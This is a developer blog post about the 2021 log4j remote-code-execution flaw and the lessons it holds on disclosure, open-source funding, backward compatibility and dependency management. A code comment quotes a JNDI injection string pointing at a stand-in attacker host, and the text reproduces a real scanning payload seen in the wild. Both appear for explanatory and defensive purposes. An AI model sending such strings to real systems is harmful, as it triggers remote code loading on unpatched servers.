Andy Kofod for Leading EDJE


The Fallout From log4j and What We Can Learn From It

By now, most people who work in software or IT have heard about the vulnerability in log4j that was disclosed last week. It has set off a high-stakes race between IT teams trying to update and patch their vulnerable systems and attackers trying to find easy targets to exploit. The resulting fallout has raised a lot of very interesting issues that bear discussion.

The Details, Briefly

If you're not familiar, log4j is an open-source logging framework for Java that's maintained by Apache. It's one of the most popular dependencies downloaded from the Maven repository. Released in January of 2001, it's nearly as old as Java itself, and is used in thousands of projects around the world.

The vulnerability itself has been reported on pretty heavily over the past few days, so I'll just summarize quickly. If an application logs any information that comes directly from the user, such as chat messages, username or email changes, etc., an attacker can craft an input that causes log4j to use the Java Naming and Directory Interface (JNDI) to load and execute code from a remote server. This type of vulnerability is commonly known as a Remote Code Execution (RCE) vulnerability.
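To make that concrete, here's a minimal sketch of the vulnerable pattern. The class and method are hypothetical, invented for illustration; the logger calls are the standard log4j 2.x API:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical controller: a value that originates from a user ends up in a log message.
public class LoginController {
    private static final Logger logger = LogManager.getLogger(LoginController.class);

    public void handleLogin(String username) {
        // On vulnerable log4j versions, if username contains something like
        // "${jndi:ldap://attacker.example.com/a}", log4j performs the JNDI lookup while
        // formatting this message and can end up loading and running attacker-hosted code.
        logger.info("Login attempt for user: {}", username);
    }
}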

So What's the Big Deal?

RCE vulnerabilities are certainly not a rare occurrence. A quick search of the CVE database shows at least 100 other vulnerabilities reported this year that mention RCEs, so why is the log4j vulnerability getting so much attention?

That's what makes this whole situation so interesting. First of all, it's an extremely popular library, used by thousands of projects ranging from the smallest hobby web apps to huge enterprise solutions. It's used in the servers of Minecraft, one of the best-selling video games of all time. And it's a dependency in the products of numerous major software vendors, including AWS, IBM, Cisco, Okta, and VMware.

This alone makes it a significant issue, but what makes it even worse is how easy the vulnerability is to exploit. A crafted message and a remote server hosting the attack payload are all that's needed to execute code on the server running log4j. The following is an example of the messages Cloudflare saw following the disclosure of the vulnerability:

${jndi:ldap://x.x.x.x/#Touch}

This is a simple example being used to scan for potential targets. If a server is vulnerable, it will send a request to x.x.x.x/#Touch, letting the attacker know the target can be exploited. A follow-up message can then be sent to exploit the vulnerability. For more details on how the vulnerability works, check out this excellent write-up from Cloudflare.
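On the defensive side, the primary fix is upgrading log4j-core to the patched release, but a widely circulated stopgap at the time of writing, for teams that can't upgrade immediately, is disabling message lookups (the option exists in log4j 2.10 and later; the JVM flag -Dlog4j2.formatMsgNoLookups=true is equivalent). A minimal sketch, assuming the property is set before log4j initializes:

public class Main {
    public static void main(String[] args) {
        // Stopgap only, not a substitute for upgrading: disable log4j message lookups.
        // Must run before any logger is created; the property exists in log4j 2.10+.
        System.setProperty("log4j2.formatMsgNoLookups", "true");

        // ... normal application startup continues here ...
    }
}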

The Disclosure Conundrum

This brings us to the first thing I found interesting about this situation. log4j is a pretty old framework, and this bug is not new. According to the Cloudflare article referenced above, it was introduced in 2013. Apparently, it went unnoticed until November 24th, when security researchers at Alibaba reported it to Apache. It wasn't publicly disclosed until December 9th, after Apache had time to create release 2.15.0 to address the issue. And the race was on.

IT teams around the world immediately began rushing to update their servers with the fixed release. At the same time, attackers started scanning the internet for vulnerable servers. Cloudflare reports that they began seeing a ramp-up of blocked attacks the day after the disclosure, peaking at 20,000 requests per minute, with between 200 and 400 IPs attacking at any given time.

And that's the conundrum. Disclosing a vulnerability, especially one that's this easy to exploit and this widespread, is bound to trigger this kind of race between attackers and defenders, and it's fascinating to watch. It seems pretty clear that the disclosure was news to attackers as well. Various reports from security researchers have been tracking the progress of organized groups on the dark web as they rush to develop new exploits.


There's a small window of time for them to hit the "low-hanging fruit" before those systems are patched. There will, of course, continue to be organizations that don't patch right away, either because they can't (due to complexity, backward compatibility, etc.) or because they don't know they have a vulnerable dependency in their codebase.

Now, I'm not suggesting that there was anything wrong with the disclosure. Alibaba's team did the right thing by reporting it to the log4j team, and giving them time to create a patch before disclosing it publicly. This is exactly how responsible disclosures should go. Maybe it's because this vulnerability has gotten so much attention, but I've found it very interesting to watch this "race" take place in real-time. I think the real lesson here is that organizations need to be prepared for this type of event. Know your dependencies, and know how you're going to upgrade them when you need to, especially when time is not on your side. If your systems are too complex to make this type of upgrade easily, it may be time to re-evaluate your architecture.
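On the "know your dependencies" point, log4j-core often arrives transitively, so it's worth checking your dependency tree (for Maven, mvn dependency:tree will show it). As a rough illustration, here's a small sketch of a runtime spot-check for whether the JNDI lookup class is present on the classpath at all; the class name is the real one shipped in log4j-core, but the rest is purely illustrative:

public class Log4jSpotCheck {
    public static void main(String[] args) {
        try {
            // The class the exploit ultimately relies on.
            Class.forName("org.apache.logging.log4j.core.lookup.JndiLookup");
            System.out.println("JndiLookup is on the classpath -- check your log4j-core version.");
        } catch (ClassNotFoundException e) {
            System.out.println("JndiLookup not found -- log4j-core is absent or the class has been removed.");
        }
    }
}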

The Paying for Open-Source Debate

Another interesting thing to come out of this incident is the re-emergence of the old arguments about whether enterprise companies should be paying to support the open-source projects they depend on. I always find this debate interesting, and I don't have a strong opinion on the issue, but I see merit to both sides.

In one camp, you have those who argue that these large enterprise organizations are taking advantage of open-source projects without giving the developers any support. This group argues that if the developers were paid for their work maintaining open-source projects, they'd have more time to dedicate to preventing vulnerabilities, as well as to adding new features. On the other hand, you have some who claim, as David Crawshaw points out, that paying for open-source software probably wouldn't have helped prevent this bug. In fact, it may be these enterprise users that kept the bug from being fixed earlier. According to one of the maintainers of log4j, the team didn't like this feature, but they weren't able to remove it due to backward compatibility concerns (we'll come back to this in a minute).

I love the idea of open-source software, and it would be great if its maintainers could get paid to keep it going, but how does that help prevent vulnerabilities like this from sneaking in? I think it's clear from the numerous vulnerabilities found in paid software that this kind of bug can easily sneak in, paid or not, but this topic seems to spring up any time a vulnerability is found in a widely used open-source project. I don't have an answer for the paid vs. open-source debate, but I will say this: if you're using third-party software in your applications, it's on you to make sure you understand what it's doing and have reviewed the code for vulnerabilities. If you can't confidently say that your software, including its dependencies, is secure, then you shouldn't be shipping it.

Back to the Backward Compatibility

Okay, circling back to the thing I mentioned a minute ago about backward compatibility. This is another interesting aspect of this incident. It appears that the maintainers were at least aware that the JNDI plugin was a potential problem, but their requirement to maintain backward compatibility prevented them from removing it. I understand the desire to maintain backward compatibility, and I'm sure it's a major concern given the number of users the log4j library has, but I also believe that open-source teams need to feel empowered to do what needs to be done, even if it means a little extra work for their users. This is especially true for security issues. Yes, removing the JNDI feature may have broken the library for some users. There would have been some grumbling as developers figured out how to modify their implementations to work with the new version. But those same developers would probably have preferred that over finding out on a Friday afternoon that they have a critical security vulnerability that has to be fixed right now.

Final Thoughts

It's been interesting to watch this event unfold, and it's got me thinking about a lot of different issues. I'll leave you with this:

  • If you have a 3rd party dependency in your codebase, or if you're using 3rd party software, this will happen to you at some point. It doesn't matter if it's paid or open-source; eventually there will be a vulnerability. Hopefully it won't be as bad as this one, but it will happen.
  • When it happens, you need to be ready to update any and all dependencies at a moment's notice. Invest in building out pipelines that make these kinds of changes quick and painless. You don't want to end up in a race with the hackers.
  • If you're using a 3rd party library, do your due diligence. Read the code. Have other developers read the code. Treat it like a code review for your own products. If it's not code that you'd accept from your own team, then don't put it in your project.

I'd like to say this event is over, but it's just getting started. Most of the big players have patched their systems by now, but there will be stragglers, and I'm sure some have already been hit. We probably won't see those disclosures for a couple of weeks yet. I think Marc Rogers sums it up pretty well.


